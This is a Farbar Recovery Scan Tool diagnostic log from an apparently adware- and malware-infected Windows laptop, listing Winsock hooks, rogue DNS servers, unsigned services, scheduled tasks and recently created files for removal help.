HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome:
=======
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 18:13 - 2016-01-10 19:21 - 00000000 ____D C:\FRST
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-01-09 21:13 - 2016-01-10 16:13 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-09 21:00 - 2016-01-09 21:00 - 00019912 ____H C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
2016-01-09 20:58 - 2016-01-09 20:58 - 00019720 ____H C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
2016-01-09 19:33 - 2016-01-10 19:30 - 00726406 _____ C:\WINDOWS\ntbtlog.txt
2016-01-09 19:24 - 2016-01-09 19:24 - 00003284 _____ C:\WINDOWS\System32\Tasks\psv_Temptough
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
2016-01-09 18:09 - 2016-01-10 16:09 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-01-09 18:09 - 2016-01-09 18:09 - 00023024 _____ C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}
2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-01-09 17:22 - 2016-01-09 17:22 - 00003270 _____ C:\WINDOWS\System32\Tasks\psv_Tripplezap
2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
2016-01-09 16:42 - 2016-01-10 16:09 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
2016-01-09 16:40 - 2016-01-09 16:40 - 00004186 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update
2016-01-09 16:40 - 2016-01-09 16:40 - 00004176 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core
2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
2016-01-09 16:36 - 2016-01-09 16:36 - 00004988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
